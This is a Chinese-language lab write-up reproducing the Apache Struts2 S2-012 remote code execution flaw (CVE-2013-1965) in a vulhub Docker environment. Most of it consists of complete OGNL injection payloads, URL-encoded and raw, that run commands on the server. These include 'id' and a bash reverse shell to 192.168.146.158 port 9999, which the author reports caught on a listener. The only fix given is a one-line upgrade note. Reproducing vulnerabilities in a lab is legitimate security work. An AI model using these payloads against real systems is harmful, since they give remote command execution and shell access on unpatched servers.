CVE-2013-1965 S2-012 远程代码执行漏洞
漏洞 远程 CVE 代码执行 2013 S2 012
2023-06-13 09:16:09 时间
1 漏洞信息
漏洞名称 | 远程代码执行漏洞 |
---|---|
漏洞编号 | CVE-2013-1965 |
危害等级 | 高危 |
漏洞类型 | 中间件漏洞 |
漏洞厂商 | Apache |
漏洞组件 | Struts2 |
受影响版本 | 2.1.0 <= Struts2 <= 2.3.13 |
漏洞概述 | S2-012中,包含特制请求参数的请求可用于将任意 OGNL 代码注入属性,然后用作重定向地址的请求参数,这将导致进一步评估。当重定向结果从堆栈中读取并使用先前注入的代码作为重定向参数时,将进行第二次评估。这使恶意用户可以将任意 OGNL 语句放入由操作公开的任何未过滤的 String 变量中,并将其评估为 OGNL 表达式,以启用方法执行并执行任意方法,从而绕过 Struts 和 OGNL 库保护。 |
2 环境搭建
2.1 环境概述
- Linux操作系统
2.2 搭建过程
拉取镜像
cd vulhub/struts2/s2-012
docker-compose up -d
3 漏洞复现
点击submit,构造一个恶意的payload并发送。
name=%25%7B%28%23cmd%3D%27echo+has+vul%27%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23a%3D%28new+java.lang.ProcessBuilder%28%23cmds%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%29%7D
payload原型:
name=%{(#cmd='echo has vul').(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#a=(new java.lang.ProcessBuilder(#cmds)).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close())}
发现成功执行了echo has vul
,说明存在该漏洞。
既然发现漏洞了,那我们可以构造一个payload,执行id命令。
name=%25%7B%28%23cmd%3D%27id%27%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23a%3D%28new+java.lang.ProcessBuilder%28%23cmds%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%29%7D
payload原型:
name=%{(#cmd='id').(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#a=(new java.lang.ProcessBuilder(#cmds)).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close())}
成功执行了id命令。
接下来开始反弹shell
bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
访问漏洞url并且添加恶意payload进行抓包。
name=%25%7B%28%23cmd%3D%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.146.158%2F9999+0%3E%261%27%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23a%3D%28new+java.lang.ProcessBuilder%28%23cmds%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%29%7D
payload原型:
name=%{(#cmd='bash -i >& /dev/tcp/192.168.146.158/9999 0>&1').(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#a=(new java.lang.ProcessBuilder(#cmds)).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close())}
攻击机进行监听,然后发现成功反弹了shell。
4 修复建议
1、推荐的解决方案:升级至比受漏洞影响的更高版本。
相关文章
- 【安全漏洞】GitLab远程代码执行漏洞
- 十大常见web漏洞及防范[通俗易懂]
- Weblogic T3协议远程代码执行漏洞(CVE-2020-2883)
- Weblogic Coherence组件远程代码执行漏洞(CVE-2020-2555)
- Weblogic JNDI远程代码执行漏洞(CVE-2021-2109)
- CVE-2019-0230 S2-059 远程代码执行漏洞
- S2-001 远程代码执行漏洞
- CVE-2013-2134 S2-015 远程代码执行漏洞
- CVE-2017-10271 Weblogic远程代码执行漏洞
- 请立即检查,WinRAR惊现远程代码执行漏洞
- Oracle 19c Linux PSU 19.17最新补丁包下载 20221018 CVE DB OJVM OPatch 34449114 34449117 漏洞 等保支持远程修复 2022年10月
- Linux Systemd被爆远程漏洞 CVE-2017
- OpenWRT 曝远程代码执行漏洞
- Zabbix爆远程代码执行漏洞、数据库写入高危漏洞(CVE-2017-2824)
- 思科Smart Install的远程代码执行漏洞(CVE-2018-0171)详细分析
- 火狐浏览器出现严重远程代码执行漏洞,现已修复
- 【重大漏洞预警】Windows两个关键远程代码执行漏洞
- PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)含PoC
- .NET Remoting 远程代码执行漏洞探究
- 微信曝远程任意代码执行漏洞,可被远程控制
- mssql 注入漏洞:利用上传文件实现远程操作(mssql 注入上传文件)